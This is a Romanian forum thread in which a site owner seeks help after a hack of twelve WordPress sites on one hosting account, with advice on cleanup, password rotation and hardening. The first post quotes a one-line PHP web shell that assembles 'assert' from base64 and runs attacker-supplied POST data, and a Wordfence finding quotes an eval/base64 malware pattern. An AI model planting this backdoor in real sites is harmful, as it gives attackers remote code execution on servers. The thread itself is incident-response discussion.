Am gasit asta pe server, cine trebuei sa remedieze? Firma de hosting sau ?Cod PHP:<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['fyt']);?>abcabcabc
Versiune printabilă
Am gasit asta pe server, cine trebuei sa remedieze? Firma de hosting sau ?Cod PHP:<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['fyt']);?>abcabcabc
Nu cred ca e treaba firmei de hosting... Un cod base64 nu trebuie neaparat "remediat". Cred ca trebuie vazut ce e cu el, unde e si ce face, deci ai nevoie de un programator caruia sa ii dai full acces la fisierele tale pentru a putea urmari codul.
Azi a avut loc "aracul", un intreg server e infestat, de cand am scris mesajul deja lurceaza, modifica fisierele index.php ... tema e cumparat, wordpress curat... na .. ce sa zic?
In cazul asta pot rezolva cei de la hosting cu un backup total rapid.
Am aflat si de unde e buba: hacked by megla akash from Team_CC
Interesant este ca au facut si sitemap .. atacul pare a fi incepand cu ora 1:10 cu modificarea robots.txt Sitemap: http://site.info/sitemap.xml ...
Intrebare: daca sterg doar wordpress.-ul si pastrez baza de dare care ar fi sansele sa scap?
Poti incerca reinstalare wp, tema, module, etc. Dar cum ai zis si tu... iti ia o gramada de timp.
Daca a putut intra inseamna ca undeva ai avut o vulnerabilitate (instalare wp, tema, module). Daca e afectata si baza de date poti rezolva daca ai un backup dar e recomandat sa schimbi atat numemele bazei de date precum si prefixele tabelelor si toate parolele.
Cred ca peste 80%
Suna-i pe cei de la gazduire, da cumva de ei.... Modificarile de care ti-am zis au doar rolul de a-l impiedica sa intre din nou accesand aceeasi vulnerabilitate. Daca a injectat ceva in db cureti de-ti vine rau....
Unde ai bre hostul de nu poti da de ei? In mod normal, ar trebui sa aiba back-up-uri si iti pot restaura ei siteurile din cateva clickuri. Tu trebuie apoi sa vezi ce trebuie sa faci sa ti le securizezi. Desi, daca zici ca ai 12 siteuri bubuite, posibil sa fie o vulnerabilitate la nivel de server.
Am vorbit cu ei, cica sa mut fiecare site pe un cPanel individual si sa-mi fac backup ...:(
Sper sa aiba ei un backup mai vechi de 1 aprilie.. apoi sa ma gandesc cum ma prind pe unde au intrat.
Si eu zic ca o fi de la server ca sunt toate 12 bubuite, sau fiind pe acelasi cPanel sa fi migrat de la unul la altul. Nu spui unde am hostul :) ca-i fac de ras... am vorbit cu ei, acum sa vedem de cand au backup sau daca au...!
UPDate: a venit si raspunsul: oferta noastra de devirusare wordpress de catre un expert este de 50 de euro + TVA / site:
Ok, 50 de euro e ok! Dar oferta lor de backup cat costa? Ca tu asta vrei...
50 x12 :) am de dat 600 de euro. La banii astia pun manual site-urile pe picioare. De back-ul nu au zis, oricum m-am apucat de sters wordpress. sper sa scap, am pus Wordfence Security si cica sunt beton!:(
Ma mira ca nu stie nimeni ce ecu hacked by megla akash from Team_CC si cum se scapa de el, sau macar pe unde intra ..!
Fa-i de ras :)) ZI-ne si noua unde ai hostul, sa ne ferim de ei.
Am gasit asta, poate e cineva interesat, idei... etc.
50 de euro e ieftin.
din pacate e extrem de greu sa afli ce anume a fost vulnerabil si daca inca mai este. tot ce poti face este sa cureti, sa faci updates la tot, sa schimbi "salt" si toate parolele.
Baza de date, daca e fix aceeasi, are parola de admin si parolele celorlalti useri, care pot fi compromise (accesul la fisiere ii da acces si la baza de date, ca sunt user si pass in wp-config.php)
O varianta de protectie supliementara este, in cazul in care ai posibilitatea, este sa nu dai voie userului php sa scrie fisiere. Deloc. (sau ma rog, sa-i dai cumva voie sa scrie doar cache, daca e neaparat necesar). Practic aloci fisierele altui user, facut de tine special pentru asta. In felul asta atacatorul poate avea acces la orice, dar nu poate schimba nimic (presupunand ca baza de date nu e accesibila remote). Va fi mai greu sa faci update (poti doar pe ftp) dar in unele cazuri merita sa scapi de un stress.
Mi-am adus aminte inca ceva.
Cele mai comune probleme apar la:
1. pluginurile luate din alte surse decat cele oficiale. Astea ar trebui scanate inainte de a fi folosite. Cel mai la indemana e virustotal, urci arhiva zip si afli daca e ceva gandac prin fisiere. Nu e o metoda 100% sigura, dar e un inceput. Daca ai norocul ca pluginul in sine sa fie facut de un golan, aia e, ti-o iei (s-au vazut cazuri si in repository la WP).
2. pluginurile premium neactualizate. Am pus un topic cu o idee care i-ar putea ajuta pe multi: http://forum.seopedia.ro/wordpress/3...tualizate.html
Practic, iei din temele alea pluginurile cele mai comune si cunoscute ca avand vulnerabilitati vechi - jscomposer si revolution slider. Sunt versiuni recente, le iei din sursa "oficiala" cu manuta ta, deci poti actualiza linistit.
@ Dan, mersi. Si eu ma gandesc ca e posibil sa fie fie o tema pe un site parasit sau un plugin neactualizat de mult. de obicei iau doar de la oficial.. dar este posibil sa fie si ceva vechi. Mai banuiesc ca e posibil sa ma fi picopsit de la un transfer de pe un host strain - adica nu al meu, unde am avut un site si l-am mutat fara sa verific la mine - in ideea ca data atacului e a doua zi dupa mutare. :(
:( da, se pare ca nu am scapat de belea, asa ca am de gand sa folosesc o strategie, sper sa ma ajutati sa-mi ziceti daca e ok. vreau sa mut un site pe alt cont de pe server, cont nou creat pe contul de resseler [ mi-au zis ca teoretic conturile sunt separate, deci nu trece nimic de la unul la altul ]. Daca ce am mutat ramane curat, fara probleme, atunci am scapat - in ideea ca pastrez doar baza de date veche si pozele, restul instalez din nou. Evident ca ma gandesc ca am nevoie si de parole noi, caci daca le-am schimbat dar problema a ramas, sunt compromise si cele noi.
Deci ai curatat dar nu ai gasit buba... Ai verificat sa nu ai vreun modul nou instalat?
Daca ai baza de date afectata si nu reusesti sa o cureti (se poate intampla) dar ai acces la wp-admin mai e o posibilitate: export la toate articolele si import pe instalare WP noua, curata, cu alta baza de date, cu prefixe schimbate la tabele, alt user, alta parola, etc.
E greu, dar tinand cont ca te-ai invatat cu munca... asta e!
Da, e cam naspa, maia les daca schimb prefixele, ca se incurca info. Am sa vad ce si cum, ma enerveaza ca la export din WPadmin nu se pastreaza pozele, sau ma incurc eu undeva, am bifat de cateva ori sa ia si pozele .. dar cucu.... dar alta varianta oricum nu vad decat asta ... baze de date noi si import prin wordpress. La o scanare cu antivirus pare curat, pluginul de securitate zice ca e ok... dar azi am gasit modificate fiserele index.php ..:( am mutat deja un site pe alt cont .. sa vad ce face... daca o saptamana e ok, le mut pe toate si sterg contul afectat! Sper sa mearga permutarea! Daca nu.. am de munca o luna ... !
Poate fi si de la un virus aflat pe PC-ul tau, sa urce codul prin loginul salvat in programul FTP. La 1-2 siteuri schimba parolele de pe alt PC si nu mai salva datele de login, apoi compara daca se reinfecteaza toate sau numai unele.
Daca-mi dai acces la DB si fisiere ma pot uita.
Mi le poti pune undeva (le arhivezi si imi dai link). Am nevoie de /public_html si de un export din baza de date.
Vad ca Wordfance incepe sa isi faca treaba [ varianta gratis, pacat ca la cea platita vor bani pentru fiecare site ]. Vad ca modalitatea de a curata si a muta pe acelasi server dar pe cont cPanel diferit da roade, pana una alta, ce a fost curatat si mutat pare ok. Va tin la curent, poate ajuta si pe altii.
Citat:
Filename: wp-content/themes/gilmor/lib/functions/theme-functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: eval(base64_decode(. The infection type is: Suspicious eval with a base64_decode.
Hostul nu cred ca va recunoaste vreodata ca s-a intamplat asa ceva din vin lui.
Wordfence e ok, dar la mine nu a curatat complet, a trebuit sa intru manual. Din fericire eram familiar cu structura wordpress si stiam ce e in plus, dar tot mi-a luat o saptamana sa curat tot.
Wordfence face bine ce face, respectiv scanarea, dar este limitat la repository de la wordpress pentru a compara fisierele, sa vada daca sunt "originale" sau nu.
Practic este posibil sa existe in tema premium (de obicei in functions.php) sau in plugin premium un cod care sa spuna "incarca si fisierul X.jpg si ruleaza-l". Fisierul X.jpg este exclus de la scanare (poti vedea in wordfence) impreuna cu png, ico si altele comune. Cand sunt rulate, umplu serverulde gandaci. Pe care tu ii cureti azi, maine, poimaine, pana te saturi si crezi ca are internetul sau universul ceva cu tine.
Mai am de mutat 4 site-uri, sper sa fie asta solutia, Ar fi culmea sa am probleme tocmai de la o tema cumparata! Nu ar fi exclus, avand in vedere ca aveau codbase asuns inc ea free. Intrebarea este cum poti sa le dovedesti ca e de la tema lor? :( Oricum sper sa nu fie asa, am mers ani buni pe free si acum sa am probleme de la ceva platit? :( :(
Inca o intrebare: Wordfance da Server State cu probleme , am curata tot sa zic asa, doar ca am un plugin "abandonat", de la asta sa fie sau de fapt e o chestie de server si trebuie sa discut cu cei de la hosting?
Am pus Wordfance pe alt site alt server si acelasi plugin, nu da eroare de server, deci ramane intrebarea, daca am avertizare, ar trebui sa discut cu cei de la hosting sau o sa dea vina pe mine? Mentionez ca este cont de reseller.
Am avut si eu ceva similar virusat (insera cod in fisierele php a unui WP care era gazduit pe un server dedicat cu servicii de administrare), cel mai probabil, din cauza firmei de gazduire.
Din fericire am identificat problema, am gasit pe net un script dedicat acelui virus (naviga intr-un anumit folder si elimina din fisiere codul dubios).
Fiindca nu am identificat problema (nu am gasit alt fisier in plus, codul php din tema era facut de mine, pluginurile erau clasice, direct de pe WP, fara ca cineva sa semnaleze vreo problema similara, schimbat parolele, fara parole ftp salvate samd) si periodic acele fisiere erau rescrise am pus scriptul intr-un cron care sa ruleze la x minute.
Dupa acest ping pong cu fisierele dupa vreo 2 zile "am scapat". Din acest motiv presupun ca a fost din vina firmei care a rezolvat la un moment dat si, bineinteles, nu a fost dispusa sa recunoasca ca a au avut anumite vulnerabilitati.
@marius Cristian: asa cred si eu ca este de la ei, am curatat tot, insa Wordfance arata o singura problema "Server stats", deci ca programator - cred ca e de la ei, acum negociez, desi ei insista sa aleg varianta platita la ei de devirusare... ceea ce nu mi se pare chiar ok! Mai ales ca am descoperit ca problema de server mai este pe alt cPanel pe acelasi cont de reseller.
Update: au mutat fiecare site pe cont propriu de cPanel. :( problema s-a pastrat adica cea de server! Vulnerabilitatea este de la un plugin "abandonat", doar ca pe alt site identic, dispare problema de server, in conditii identice.
https://bursadedomenii.files.wordpre.../wordfance.jpg
Wordfance zice asa la eroare de server:
Server State
Scan for unauthorized DNS changes
Monitor disk space
Scan for misconfigured How does Wordfence get IPs
PHP Version Check (Can not be disabled)
Solutia celor de la hosting: Puteti sa apelati oricand la suportul celor de la wordfence pentru mai multe detalii.